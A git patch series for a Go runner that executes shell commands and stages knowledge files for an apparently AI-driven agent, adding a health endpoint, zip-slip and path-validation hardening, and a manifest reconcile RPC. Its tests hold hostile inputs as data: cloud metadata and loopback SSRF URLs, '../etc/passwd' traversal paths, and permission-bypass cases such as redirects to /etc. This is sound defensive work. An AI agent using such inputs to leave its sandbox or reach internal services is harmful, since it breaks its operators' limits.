insertions(+), 22 deletions(-) diff --git a/cmd/main.go b/cmd/main.go index 5956afc..6432102 100644 --- a/cmd/main.go +++ b/cmd/main.go @@ -5,6 +5,8 @@ import ( "context" "fmt" "log/slog" + "net" + "net/http" 
"os" "os/signal" "path/filepath" @@ -38,6 +40,11 @@ var ( const ( defaultURL = "wss://api.flashcat.cloud/safari/environment/ws" defaultLogLevel = "info" + // healthAddr is bound by the runner so cloud sandbox platforms (e.g. Tencent + // AGS) can satisfy their HTTP readiness probe — the runner only opens + // outbound WebSockets otherwise, leaving no inbound port for the platform + // to probe. + healthAddr = ":49983" ) func main() { @@ -218,6 +225,8 @@ func runRunner() error { ctx, cancel := context.WithCancel(context.Background()) defer cancel() + startHealthServer(ctx) + sigCh := make(chan os.Signal, 1) signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) @@ -278,6 +287,33 @@ func setupLogging(levelStr string) { slog.SetDefault(slog.New(handler)) } +// startHealthServer binds a tiny HTTP listener that always answers /health 200. +// Required by Tencent AGS (and similar serverless sandbox platforms) which gate +// instance start on an HTTP readiness probe within ~30s. +func startHealthServer(ctx context.Context) { + // AGS readiness probes hit the pod from outside, so binding to all + // interfaces is required — the listener only serves a fixed 200 on /health. 
+ var lc net.ListenConfig + ln, err := lc.Listen(ctx, "tcp", healthAddr) // #nosec G102 -- intentional: external readiness probe + + if err != nil { + slog.Warn("health server skipped (port already in use)", "addr", healthAddr, "err", err) + return + } + mux := http.NewServeMux() + mux.HandleFunc("/health", func(w http.ResponseWriter, _ *http.Request) { + w.WriteHeader(http.StatusOK) + _, _ = w.Write([]byte("ok")) + }) + srv := &http.Server{Handler: mux, ReadHeaderTimeout: 5 * time.Second} + go func() { + if err := srv.Serve(ln); err != nil && err != http.ErrServerClosed { + slog.Warn("health server stopped", "err", err) + } + }() + slog.Info("health server listening", "addr", healthAddr) +} + func parseLogLevel(levelStr string) slog.Level { switch levelStr { case "debug": diff --git a/environment/environment.go b/environment/environment.go index 86c1658..9d1420f 100644 --- a/environment/environment.go +++ b/environment/environment.go @@ -650,9 +650,11 @@ func (e *Environment) executeBashCommand(ctx context.Context, command, workdir s err := cmd.Run() exitCode := 0 if err != nil { - if exitError, ok := err.(*exec.ExitError); ok { + var exitError *exec.ExitError + switch { + case errors.As(err, &exitError): exitCode = exitError.ExitCode() - } else if ctx.Err() == context.DeadlineExceeded { + case ctx.Err() == context.DeadlineExceeded: res := &protocol.BashResult{ Stdout: stdout.String(), Stderr: "command timed out", @@ -663,11 +665,10 @@ func (e *Environment) executeBashCommand(ctx context.Context, command, workdir s res.Truncated = true } return res, nil - } else if errors.Is(err, ErrOutputCapped) { + case errors.Is(err, ErrOutputCapped): // Command itself didn't fail — only the writer's contract violation // surfaced. Treat as a successful run with capped buffers. 
- err = nil - } else { + default: return nil, fmt.Errorf("failed to execute command: %w", err) } } @@ -891,7 +892,7 @@ func (e *Environment) SyncSkill(ctx context.Context, args *protocol.SyncSkillArg // Probe phase: cache hit if .checksum matches AND SKILL.md exists. cachedSum, _ := os.ReadFile(filepath.Join(skillDir, ".checksum")) if string(cachedSum) == args.Checksum { - if _, err := os.Stat(filepath.Join(skillDir, "SKILL.md")); err == nil { + if _, statErr := os.Stat(filepath.Join(skillDir, "SKILL.md")); statErr == nil { return &protocol.SyncSkillResult{Success: true, Path: skillDir, Cached: true}, nil } } @@ -923,12 +924,12 @@ func (e *Environment) unzipSkill(data []byte, dest string) error { } // Remove existing directory if exists - if err := os.RemoveAll(dest); err != nil { - return fmt.Errorf("failed to remove existing directory: %w", err) + if rmErr := os.RemoveAll(dest); rmErr != nil { + return fmt.Errorf("failed to remove existing directory: %w", rmErr) } - if err := os.MkdirAll(dest, 0o755); err != nil { - return fmt.Errorf("failed to create destination directory: %w", err) + if mkErr := os.MkdirAll(dest, 0o755); mkErr != nil { + return fmt.Errorf("failed to create destination directory: %w", mkErr) } // Resolve dest to absolute and append a trailing separator BEFORE the diff --git a/environment/netsafe.go b/environment/netsafe.go index e7babd2..74c55b0 100644 --- a/environment/netsafe.go +++ b/environment/netsafe.go @@ -143,7 +143,11 @@ func safeDialContext(dialTimeout time.Duration) func(ctx context.Context, networ // safeHTTPTransport returns an *http.Transport wired with safeDialContext // and sensible pool sizes. 
func safeHTTPTransport(dialTimeout time.Duration) *http.Transport { - t := http.DefaultTransport.(*http.Transport).Clone() + base, ok := http.DefaultTransport.(*http.Transport) + if !ok { + base = &http.Transport{} + } + t := base.Clone() t.DialContext = safeDialContext(dialTimeout) return t } diff --git a/environment/security_test.go b/environment/security_test.go index c7820ee..527361b 100644 --- a/environment/security_test.go +++ b/environment/security_test.go @@ -101,9 +101,9 @@ func TestUnzipSkill_AcceptsBenign(t *testing.T) { env := newTestEnvironment(t) dest := filepath.Join(t.TempDir(), "skills", "ok") zipData := buildTestZip(t, map[string]string{ - "SKILL.md": "# hi", - "resources/a.txt": "alpha", - "scripts/b.sh": "#!/bin/sh\n", + "SKILL.md": "# hi", + "resources/a.txt": "alpha", + "scripts/b.sh": "#!/bin/sh\n", }) require.NoError(t, env.unzipSkill(zipData, dest)) for _, rel := range []string{"SKILL.md", "resources/a.txt", "scripts/b.sh"} { @@ -123,8 +123,8 @@ func TestWebFetch_RefusesSSRFTargets(t *testing.T) { env := newTestEnvironment(t) cases := []string{ "http://169.254.169.254/latest/meta-data/", // AWS / Aliyun / GCP IMDS - "http://127.0.0.1/", // loopback - "http://10.0.0.1/", // RFC1918 + "http://127.0.0.1/", // loopback + "http://10.0.0.1/", // RFC1918 } for _, raw := range cases { t.Run(raw, func(t *testing.T) { diff --git a/permission/permission.go b/permission/permission.go index 6f76ae9..773279f 100644 --- a/permission/permission.go +++ b/permission/permission.go @@ -1,6 +1,6 @@ // Package permission implements glob-based command permission checking. // -// Matching semantics +// # Matching semantics // // Rules are evaluated against three normalized projections of every shell // command found anywhere in the input — including pipelines, command @@ -22,7 +22,7 @@ // shell printer's canonical formatter, so "kubectl get pods" matches // the rule "kubectl get pods" regardless of spacing. 
// -// Precedence +// # Precedence // // Rules are evaluated in specificity order, and the first match wins. // Specificity is "longer literal prefix before any '*' wins"; the catch-all @@ -279,7 +279,7 @@ func writeRedirectPrefix(op syntax.RedirOperator) string { return ">" case syntax.AppOut: return ">>" - case syntax.ClbOut: + case syntax.RdrClob: return ">|" case syntax.RdrAll: return "&>" diff --git a/permission/permission_test.go b/permission/permission_test.go index 7688057..34b17ac 100644 --- a/permission/permission_test.go +++ b/permission/permission_test.go @@ -257,7 +257,7 @@ func TestChecker_ASTBypassHardening(t *testing.T) { }, // Redirect targets must be gated. { - name: "write redirect to /etc blocked under read-only rules", + name: "write redirect to /etc blocked under read-only rules", rules: SafeReadOnlyRules(), // "echo *" was removed, so this is doubly blocked, but the // redirect-target check is what makes this safe even if echo @@ -325,8 +325,8 @@ func TestChecker_ASTBypassHardening(t *testing.T) { { name: "extra spaces still match", rules: map[string]string{ - "*": "deny", - "kubectl get *": "allow", + "*": "deny", + "kubectl get *": "allow", }, command: "kubectl get pods", wantErr: false, From d5b5a5d69e3a10ece0de1ef0de568b794169d3fd Mon Sep 17 00:00:00 2001 From: ysyneu Date: Sat, 2 May 2026 20:59:45 +0800 Subject: [PATCH 10/11] fix(ci): drop invalid G706 gosec exclude + handle unix-abs zip-slip on windows - .golangci.yml: pinned CI golangci-lint v2.4 rejects G706 under gosec.excludes (rule unknown to its gosec). Move suppression to the version-safe linters.exclusions.rules text match so both v2.4 and newer versions stay quiet. Same regression previously fixed in a60df85. - environment/unzipSkill: filepath.IsAbs("/etc/passwd") returns false on Windows (no drive letter), so the absolute-path guard let the entry slip through and TestUnzipSkill_RejectsZipSlip/absolute-path-unix failed on windows-latest. 
Reject leading "/" or "\\" on the raw name before Clean normalizes separators. Co-Authored-By: Claude Opus 4.7 (1M context) --- .golangci.yml | 15 ++++++++++----- environment/environment.go | 7 +++++++ 2 files changed, 17 insertions(+), 5 deletions(-) diff --git a/.golangci.yml b/.golangci.yml index 122e243..22459b2 100644 --- a/.golangci.yml +++ b/.golangci.yml @@ -47,15 +47,20 @@ linters: # Exclude G301 (directory permissions) - workspace needs readable directories # Exclude G304 (file inclusion) - paths are validated via safePath() # Exclude G306 (file permissions) - workspace files need to be readable - # Exclude G706 (log taint via taint analysis) - slog's structured - # key-value logging is not a format-string injection vector; the rule - # fires on every slog call that includes a user-controlled value, which - # is the whole point of structured logging. excludes: - G301 - G304 - G306 - - G706 + exclusions: + rules: + # G706 (log injection via taint) is added in newer gosec versions and + # not in our pinned CI golangci-lint v2.4 — listing it under + # gosec.excludes fails `config verify` there. Match by text instead so + # newer versions also stay quiet: slog's structured key/value logging + # is not a format-string injection vector. + - linters: + - gosec + text: "G706" formatters: enable: diff --git a/environment/environment.go b/environment/environment.go index 9d1420f..2291f26 100644 --- a/environment/environment.go +++ b/environment/environment.go @@ -950,6 +950,13 @@ func (e *Environment) unzipSkill(data []byte, dest string) error { if strings.Contains(f.Name, "..") { return fmt.Errorf("invalid file path in zip: %s", f.Name) } + // Reject leading "/" or "\" on the raw name. filepath.IsAbs is + // platform-dependent and misses unix-style "/etc/passwd" on Windows + // (no drive letter), so check the raw name before Clean rewrites + // separators. 
+	if strings.HasPrefix(f.Name, "/") || strings.HasPrefix(f.Name, `\`) {
+		return fmt.Errorf("invalid file path in zip: %s", f.Name)
+	}
 	cleanName := filepath.Clean(f.Name)
 	if strings.HasPrefix(cleanName, "..") || filepath.IsAbs(cleanName) {
 		return fmt.Errorf("invalid file path in zip: %s", f.Name)

From 95ca4c5782c0df68f4766738f591658bfbc758b7 Mon Sep 17 00:00:00 2001
From: ysyneu
Date: Thu, 7 May 2026 10:26:58 +0800
Subject: [PATCH 11/11] feat(knowledge): reconcile_knowledge_manifest RPC for orphan/stale prune + missing-file diff

Adds a per-session RPC so Safari can declare its current view of which
knowledge files should exist (manifest = list of rel_path + sha256). The
runner walks <workspace>/knowledge/<scope>/, deletes anything not in the
manifest (orphan prune), deletes anything whose sha disagrees with the
sentinel (stale prune), and returns NeedsStage = manifest entries it
doesn't have on disk after the prune step.

Safari uses NeedsStage to drive a follow-up bulk StageKnowledgeFiles so
the full pack lands at session start instead of lazily on first read.
This is what makes ~/.flashduty/knowledge/<scope>/ look like the actual
pack contents (DUTY.md + every runbook) instead of just whatever the LLM
happened to read in the current turn.

Walks the on-disk tree (rather than trusting the sentinel) so manual
operator drops also get reconciled instead of lingering forever. Reuses
the existing sentinel + advisory lock so concurrent stage calls from the
same Safari are safe.

Pairs with fc-safari change wiring BuildManifest +
ReconcileKnowledgeManifest + EagerStageMissing into mw_env.
Co-Authored-By: Claude Opus 4.7 (1M context)
---
 environment/knowledge.go      | 191 ++++++++++++++++++++--
 environment/knowledge_test.go | 298 ++++++++++++++++++++++++++++++----
 protocol/messages.go          |  41 ++++-
 ws/handler.go                 |   8 +
 4 files changed, 486 insertions(+), 52 deletions(-)

diff --git a/environment/knowledge.go b/environment/knowledge.go
index 63155ce..455d535 100644
--- a/environment/knowledge.go
+++ b/environment/knowledge.go
@@ -8,11 +8,18 @@ import (
 	"log/slog"
 	"os"
 	"path/filepath"
+	"regexp"
 	"strings"

 	"github.com/flashcatcloud/flashduty-runner/protocol"
 )

+// teamScopeRe matches the only legal team-scope directory name: `team_` plus
+// one or more digits. Anything else (e.g. `team_42a`, `team_`, `Team_42`) is
+// rejected so the runner can never be tricked into mkdir'ing an attacker-
+// supplied directory name.
+var teamScopeRe = regexp.MustCompile(`^team_\d+$`)
+
 const (
 	// sentinelName is the hidden JSON map that tracks staged-file checksums.
 	// Safari reads this to decide which knowledge pack files are already current.
@@ -21,27 +28,43 @@ const (

 // validateKnowledgeRelPath enforces the path rules for knowledge file operations.
 //
-// Rules (from the Safari-side contract):
-//   - Must not contain path separators or double-dot components — the runner
-//     only writes flat files in the workspace root, never in sub-directories.
-//   - Leading-dot filenames are rejected because they are hidden by convention;
-//     the sentinel is written by the runner itself and is never staged by clients.
+// Layout: every staged file lives under `knowledge/<scope>/` where
+// scope is `account` or `team_<team_id>`. The leading `knowledge/` segment
+// matches the runner-relative form of the read path Safari uses
+// (`<workspace>/knowledge/<scope>/<file>`), so a freshly staged file lands at
+// exactly the location a follow-up read will probe — no contract drift.
+//
+// Bare-leaf paths (`DUTY.md`), deeper trees (`knowledge/account/sub/foo.md`),
+// missing prefix (`account/foo.md`), unknown scope segments, and the
+// sentinel filename are all rejected. Backslashes are blocked to cover the
+// Windows-style traversal vector defensively even though the runner only
+// ships on unix.
 func validateKnowledgeRelPath(relPath string) error {
 	if relPath == "" {
 		return fmt.Errorf("rel_path must not be empty")
 	}
-	if strings.ContainsAny(relPath, `/\`) {
-		return fmt.Errorf("rel_path must not contain path separators: %q", relPath)
+	if strings.ContainsRune(relPath, '\\') {
+		return fmt.Errorf("rel_path must not contain backslash: %q", relPath)
+	}
+	parts := strings.Split(relPath, "/")
+	if len(parts) != 3 {
+		return fmt.Errorf("rel_path must be knowledge/<scope>/<file>, got %q", relPath)
+	}
+	root, scope, leaf := parts[0], parts[1], parts[2]
+	if root != "knowledge" {
+		return fmt.Errorf("rel_path must start with 'knowledge/', got %q", relPath)
 	}
-	// Reject the bare ".." token. Slash-separated traversal like "foo/../bar"
-	// is already blocked above, but a plain ".." with no slashes still escapes.
-	if relPath == ".." {
-		return fmt.Errorf("rel_path must not be '..': %q", relPath)
+	if scope != "account" && !teamScopeRe.MatchString(scope) {
+		return fmt.Errorf("rel_path scope must be 'account' or 'team_<team_id>', got %q", scope)
 	}
-	if strings.HasPrefix(relPath, ".") {
-		// Hidden files (including the sentinel itself) cannot be staged by clients.
-		// The runner owns the sentinel exclusively.
-		return fmt.Errorf("rel_path must not start with '.': %q", relPath)
+	if leaf == "" || leaf == "." || leaf == ".." {
+		return fmt.Errorf("rel_path leaf must be a real filename, got %q", leaf)
+	}
+	if strings.HasPrefix(leaf, ".") {
+		return fmt.Errorf("rel_path leaf must not start with '.': %q", leaf)
+	}
+	if leaf == sentinelName {
+		return fmt.Errorf("rel_path leaf must not be the sentinel filename")
 	}
 	return nil
 }
@@ -166,6 +189,12 @@ func (e *Environment) StageKnowledgeFiles(ctx context.Context, args *protocol.St
 		}

 		targetPath := filepath.Join(e.root, f.RelPath)
+		if err := os.MkdirAll(filepath.Dir(targetPath), 0o755); err != nil {
+			status.Success = false
+			status.Error = fmt.Sprintf("failed to create scope directory: %v", err)
+			result.Files = append(result.Files, status)
+			continue
+		}
 		if err := atomicWriteFile(targetPath, content, 0o644); err != nil {
 			status.Success = false
 			status.Error = err.Error()
@@ -197,6 +226,138 @@ func (e *Environment) StageKnowledgeFiles(ctx context.Context, args *protocol.St
 	return result, nil
 }

+// ReconcileKnowledgeManifest reconciles the on-disk knowledge tree against the
+// supplied manifest. Files present on disk but absent from the manifest are
+// orphans (pruned). Files present in the manifest with a checksum that
+// disagrees with the sentinel are stale (also pruned, so the next read
+// triggers a fresh lazy install from Safari). Files whose checksum already
+// matches are left in place.
+//
+// The runner does NOT pre-stage anything in this call: the manifest declares
+// what *should* exist if it were read, not what *must* be cached. Cold packs
+// stay cold; only drift is corrected. The whole pass runs under the sentinel
+// lock so it is safe with concurrent stage calls from the same Safari.
+func (e *Environment) ReconcileKnowledgeManifest(ctx context.Context, args *protocol.ReconcileKnowledgeManifestArgs) (*protocol.ReconcileKnowledgeManifestResult, error) { + expected := make(map[string]string, len(args.Files)) + for _, f := range args.Files { + if err := validateKnowledgeRelPath(f.RelPath); err != nil { + slog.Warn("skipping invalid manifest entry", "rel_path", f.RelPath, "error", err) + continue + } + expected[f.RelPath] = f.Checksum + } + + result := &protocol.ReconcileKnowledgeManifestResult{} + knowledgeRoot := filepath.Join(e.root, "knowledge") + sentinelPath := filepath.Join(e.root, sentinelName) + + err := withSentinelLock(sentinelPath, func() error { + sentinel := readSentinel(sentinelPath) + // onDisk enumerates `knowledge//` paths actually present. + // We walk the tree (rather than trusting the sentinel) so a manual + // drop into the workspace — e.g. an operator copying a file in for + // debugging — also gets reconciled instead of lingering forever. + onDisk, err := walkKnowledgeTree(knowledgeRoot) + if err != nil { + return err + } + + dirty := false + // onDiskSet lets us answer "is this manifest entry already cached?" + // in O(1) below without a second walk. + onDiskSet := make(map[string]struct{}, len(onDisk)) + for _, relPath := range onDisk { + expectedSum, want := expected[relPath] + switch { + case !want: + // Orphan: not declared in the current manifest. + if rmErr := os.Remove(filepath.Join(e.root, relPath)); rmErr != nil && !os.IsNotExist(rmErr) { + slog.Warn("failed to prune orphan knowledge file", "rel_path", relPath, "error", rmErr) + continue + } + delete(sentinel, relPath) + result.Pruned = append(result.Pruned, relPath) + dirty = true + case sentinel[relPath] != expectedSum: + // Stale: sentinel disagrees with the manifest. Drop the file; + // it'll come back via NeedsStage so Safari refetches it from S3. 
+				if rmErr := os.Remove(filepath.Join(e.root, relPath)); rmErr != nil && !os.IsNotExist(rmErr) {
+					slog.Warn("failed to prune stale knowledge file", "rel_path", relPath, "error", rmErr)
+					continue
+				}
+				delete(sentinel, relPath)
+				result.Pruned = append(result.Pruned, relPath)
+				result.StaleCount++
+				dirty = true
+			default:
+				result.KeptCount++
+				onDiskSet[relPath] = struct{}{}
+			}
+		}
+
+		// Anything in the manifest that isn't in onDiskSet is a cache miss
+		// the caller needs to fix — either it was just pruned for being stale
+		// or it was never staged in the first place. The list is what powers
+		// Safari's eager-stage step so the full pack lands on disk in one
+		// batch instead of waiting for the agent to read each file.
+		for relPath := range expected {
+			if _, ok := onDiskSet[relPath]; !ok {
+				result.NeedsStage = append(result.NeedsStage, relPath)
+			}
+		}
+
+		if dirty {
+			return writeSentinel(sentinelPath, sentinel)
+		}
+		return nil
+	})
+	if err != nil {
+		return nil, fmt.Errorf("reconcile manifest: %w", err)
+	}
+	return result, nil
+}
+
+// walkKnowledgeTree returns every leaf file under <knowledgeRoot>/<scope>/
+// as `knowledge/<scope>/<file>` rel-paths. Hidden files (the sentinel) and
+// anything failing validation are skipped; nested directories beneath a scope
+// are ignored because the layout forbids them.
+func walkKnowledgeTree(knowledgeRoot string) ([]string, error) { + entries, err := os.ReadDir(knowledgeRoot) + if err != nil { + if os.IsNotExist(err) { + return nil, nil + } + return nil, fmt.Errorf("read knowledge root: %w", err) + } + + var paths []string + for _, scope := range entries { + if !scope.IsDir() { + continue + } + scopeName := scope.Name() + if scopeName != "account" && !teamScopeRe.MatchString(scopeName) { + continue + } + leaves, err := os.ReadDir(filepath.Join(knowledgeRoot, scopeName)) + if err != nil { + slog.Warn("failed to read scope directory", "scope", scopeName, "error", err) + continue + } + for _, leaf := range leaves { + if leaf.IsDir() { + continue + } + rel := "knowledge/" + scopeName + "/" + leaf.Name() + if err := validateKnowledgeRelPath(rel); err != nil { + continue + } + paths = append(paths, rel) + } + } + return paths, nil +} + // DeleteKnowledgeFiles removes the supplied files from the workspace root and // scrubs their entries from the sentinel. func (e *Environment) DeleteKnowledgeFiles(ctx context.Context, args *protocol.DeleteKnowledgeFilesArgs) (*protocol.DeleteKnowledgeFilesResult, error) { diff --git a/environment/knowledge_test.go b/environment/knowledge_test.go index 76202d7..e8384e7 100644 --- a/environment/knowledge_test.go +++ b/environment/knowledge_test.go @@ -42,21 +42,48 @@ func TestStageKnowledgeFiles_Single(t *testing.T) { result, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{ Files: []protocol.KnowledgeFile{ - {RelPath: "DUTY.md", Checksum: "abc123", ContentB64: b64("# Duty\n")}, + {RelPath: "knowledge/account/DUTY.md", Checksum: "abc123", ContentB64: b64("# Duty\n")}, }, }) require.NoError(t, err) require.Len(t, result.Files, 1) - assert.True(t, result.Files[0].Success) + assert.True(t, result.Files[0].Success, "stage failed: %s", result.Files[0].Error) assert.Empty(t, result.Files[0].Error) - assert.Equal(t, "# Duty\n", fileContent(t, ws.Root(), "DUTY.md")) + assert.Equal(t, "# 
Duty\n", fileContent(t, ws.Root(), "knowledge/account/DUTY.md")) + + sentinel := readSentinelMap(t, ws.Root()) + assert.Equal(t, "abc123", sentinel["knowledge/account/DUTY.md"]) +} + +// Stage files for two scopes in one call → both directories materialise and +// the sentinel records both keys. Locks in the multi-scope contract that +// motivated relaxing validateKnowledgeRelPath in the first place. +func TestStageKnowledgeFiles_AccountAndTeam(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + result, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{ + Files: []protocol.KnowledgeFile{ + {RelPath: "knowledge/account/DUTY.md", Checksum: "asum", ContentB64: b64("a")}, + {RelPath: "knowledge/team_42/escalation.md", Checksum: "tsum", ContentB64: b64("t")}, + }, + }) + require.NoError(t, err) + require.Len(t, result.Files, 2) + for i, st := range result.Files { + assert.True(t, st.Success, "file %d (%s) failed: %s", i, st.RelPath, st.Error) + } + + assert.Equal(t, "a", fileContent(t, ws.Root(), "knowledge/account/DUTY.md")) + assert.Equal(t, "t", fileContent(t, ws.Root(), "knowledge/team_42/escalation.md")) sentinel := readSentinelMap(t, ws.Root()) - assert.Equal(t, "abc123", sentinel["DUTY.md"]) + assert.Equal(t, "asum", sentinel["knowledge/account/DUTY.md"]) + assert.Equal(t, "tsum", sentinel["knowledge/team_42/escalation.md"]) } -// Case 2: mixed batch — one valid file + one with '/' in rel_path. +// Case 2: mixed batch — one valid file + one with an extra '/' segment. // The valid file must land; the invalid one must return an error in the ack; // the sentinel must contain only the valid entry. 
func TestStageKnowledgeFiles_MixedValidity(t *testing.T) {
@@ -65,8 +92,8 @@ func TestStageKnowledgeFiles_MixedValidity(t *testing.T) {
 
 	result, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{
 		Files: []protocol.KnowledgeFile{
-			{RelPath: "DUTY.md", Checksum: "goodsum", ContentB64: b64("content")},
-			{RelPath: "sub/evil.md", Checksum: "badsum", ContentB64: b64("evil")},
+			{RelPath: "knowledge/account/DUTY.md", Checksum: "goodsum", ContentB64: b64("content")},
+			{RelPath: "knowledge/account/sub/evil.md", Checksum: "badsum", ContentB64: b64("evil")},
 		},
 	})
 	require.NoError(t, err)
@@ -76,18 +103,18 @@ func TestStageKnowledgeFiles_MixedValidity(t *testing.T) {
 	assert.True(t, result.Files[0].Success)
 	assert.Empty(t, result.Files[0].Error)
 
-	// Second entry (slash in path) should fail.
+	// Second entry (deeper than knowledge/<scope>/) should fail.
 	assert.False(t, result.Files[1].Success)
 	assert.NotEmpty(t, result.Files[1].Error)
 
 	// Only valid file exists on disk.
-	assert.FileExists(t, filepath.Join(ws.Root(), "DUTY.md"))
-	assert.NoFileExists(t, filepath.Join(ws.Root(), "sub/evil.md"))
+	assert.FileExists(t, filepath.Join(ws.Root(), "knowledge/account/DUTY.md"))
+	assert.NoFileExists(t, filepath.Join(ws.Root(), "knowledge/account/sub/evil.md"))
 
 	// Sentinel has only the good entry.
sentinel := readSentinelMap(t, ws.Root()) - assert.Equal(t, "goodsum", sentinel["DUTY.md"]) - _, hasBad := sentinel["sub/evil.md"] + assert.Equal(t, "goodsum", sentinel["knowledge/account/DUTY.md"]) + _, hasBad := sentinel["knowledge/account/sub/evil.md"] assert.False(t, hasBad) } @@ -99,22 +126,22 @@ func TestStageKnowledgeFiles_Overwrite(t *testing.T) { _, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{ Files: []protocol.KnowledgeFile{ - {RelPath: "runbook.md", Checksum: "v1sum", ContentB64: b64("version 1")}, + {RelPath: "knowledge/account/runbook.md", Checksum: "v1sum", ContentB64: b64("version 1")}, }, }) require.NoError(t, err) _, err = ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{ Files: []protocol.KnowledgeFile{ - {RelPath: "runbook.md", Checksum: "v2sum", ContentB64: b64("version 2")}, + {RelPath: "knowledge/account/runbook.md", Checksum: "v2sum", ContentB64: b64("version 2")}, }, }) require.NoError(t, err) - assert.Equal(t, "version 2", fileContent(t, ws.Root(), "runbook.md")) + assert.Equal(t, "version 2", fileContent(t, ws.Root(), "knowledge/account/runbook.md")) sentinel := readSentinelMap(t, ws.Root()) - assert.Equal(t, "v2sum", sentinel["runbook.md"]) + assert.Equal(t, "v2sum", sentinel["knowledge/account/runbook.md"]) } // Case 4: delete a previously staged file → file gone, sentinel entry gone. @@ -125,22 +152,22 @@ func TestDeleteKnowledgeFiles_Staged(t *testing.T) { // Stage first. _, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{ Files: []protocol.KnowledgeFile{ - {RelPath: "old-runbook.md", Checksum: "deadbeef", ContentB64: b64("old content")}, + {RelPath: "knowledge/account/old-runbook.md", Checksum: "deadbeef", ContentB64: b64("old content")}, }, }) require.NoError(t, err) // Delete. 
delResult, err := ws.DeleteKnowledgeFiles(ctx, &protocol.DeleteKnowledgeFilesArgs{ - RelPaths: []string{"old-runbook.md"}, + RelPaths: []string{"knowledge/account/old-runbook.md"}, }) require.NoError(t, err) assert.True(t, delResult.Success) - assert.NoFileExists(t, filepath.Join(ws.Root(), "old-runbook.md")) + assert.NoFileExists(t, filepath.Join(ws.Root(), "knowledge/account/old-runbook.md")) sentinel := readSentinelMap(t, ws.Root()) - _, exists := sentinel["old-runbook.md"] + _, exists := sentinel["knowledge/account/old-runbook.md"] assert.False(t, exists) } @@ -150,7 +177,7 @@ func TestDeleteKnowledgeFiles_Missing(t *testing.T) { ctx := context.Background() result, err := ws.DeleteKnowledgeFiles(ctx, &protocol.DeleteKnowledgeFilesArgs{ - RelPaths: []string{"does-not-exist.md"}, + RelPaths: []string{"knowledge/account/does-not-exist.md"}, }) require.NoError(t, err) assert.True(t, result.Success) @@ -165,18 +192,18 @@ func TestStageDeleteCycle(t *testing.T) { for i := range 2 { _, err := ws.StageKnowledgeFiles(ctx, &protocol.StageKnowledgeFilesArgs{ Files: []protocol.KnowledgeFile{ - {RelPath: "cycle.md", Checksum: "cycle", ContentB64: b64("cycle")}, + {RelPath: "knowledge/account/cycle.md", Checksum: "cycle", ContentB64: b64("cycle")}, }, }) require.NoError(t, err, "stage iteration %d", i) _, err = ws.DeleteKnowledgeFiles(ctx, &protocol.DeleteKnowledgeFilesArgs{ - RelPaths: []string{"cycle.md"}, + RelPaths: []string{"knowledge/account/cycle.md"}, }) require.NoError(t, err, "delete iteration %d", i) } - assert.NoFileExists(t, filepath.Join(ws.Root(), "cycle.md")) + assert.NoFileExists(t, filepath.Join(ws.Root(), "knowledge/account/cycle.md")) sentinel := readSentinelMap(t, ws.Root()) assert.Empty(t, sentinel) @@ -192,9 +219,15 @@ func TestStageKnowledgeFiles_RejectedPaths(t *testing.T) { desc string }{ {"../etc/passwd", "path traversal with .."}, - {"sub/x.md", "subdirectory path with /"}, - {".hidden.md", "leading-dot filename"}, - {sentinelName, "sentinel 
filename itself"},
+		{"knowledge/account/sub/x.md", "deeper than knowledge/<scope>/"},
+		{"knowledge/account/.hidden.md", "leading-dot leaf"},
+		{"knowledge/account/" + sentinelName, "sentinel filename leaf"},
+		{"account/DUTY.md", "missing knowledge/ prefix"},
+		{"DUTY.md", "bare leaf without scope"},
+		{"knowledge/unknown_scope/x.md", "unknown scope segment"},
+		{"knowledge/team_/x.md", "empty team id"},
+		{"knowledge/team_42a/x.md", "non-digit team suffix"},
+		{"skill/account/x.md", "wrong root segment"},
 		{"", "empty string"},
 	}
 
@@ -217,22 +250,217 @@
 // thorough coverage of edge cases.
 func TestValidateKnowledgeRelPath(t *testing.T) {
 	valid := []string{
-		"DUTY.md", "runbook-api.md", "README.txt", "a",
+		"knowledge/account/DUTY.md", "knowledge/account/runbook-api.md",
+		"knowledge/account/README.txt", "knowledge/account/a",
+		"knowledge/team_1/x.md", "knowledge/team_42/escalation.md", "knowledge/team_999/foo.md",
+		// Double-dot in the middle of a filename is a legal flat name.
+		"knowledge/account/foo..bar", "knowledge/account/v2..md",
 	}
 	for _, p := range valid {
 		assert.NoError(t, validateKnowledgeRelPath(p), "should be valid: %q", p)
 	}
 
 	invalid := []string{
-		"", "..", "a/b", `a\b`, ".hidden", sentinelName, "foo/../bar",
-		// These are now valid because ".." only matches the bare token, not
-		// substrings — "foo..bar" is a legitimate flat filename.
- } - validButPreviouslyRejected := []string{"foo..bar", "v2..md"} - for _, p := range validButPreviouslyRejected { - assert.NoError(t, validateKnowledgeRelPath(p), "should be valid (double-dot in middle): %q", p) + "", "..", "DUTY.md", "a", "account/x.md", `knowledge\account\x.md`, + "knowledge/account/", "knowledge/account/.hidden", + "knowledge/account/" + sentinelName, + "knowledge/account/sub/x.md", + "knowledge/account/../etc/passwd", "knowledge/account/..", + "knowledge/foo/x.md", "knowledge/team_/x.md", + "knowledge/team_42a/x.md", "knowledge/Team_42/x.md", + "skill/account/x.md", "knowledge", "knowledge/", "knowledge/account", } for _, p := range invalid { assert.Error(t, validateKnowledgeRelPath(p), "should be invalid: %q", p) } } + +// stageOne is a tiny helper that lands a single file into the test workspace +// so reconcile tests can set up scenarios without restating the boilerplate. +func stageOne(t *testing.T, ws *Environment, relPath, sum, body string) { + t.Helper() + res, err := ws.StageKnowledgeFiles(context.Background(), &protocol.StageKnowledgeFilesArgs{ + Files: []protocol.KnowledgeFile{{RelPath: relPath, Checksum: sum, ContentB64: b64(body)}}, + }) + require.NoError(t, err) + require.Len(t, res.Files, 1) + require.True(t, res.Files[0].Success, res.Files[0].Error) +} + +// Reconcile case 1: every staged file matches the manifest → no prune, +// kept_count == staged count, sentinel untouched, nothing needs staging. 
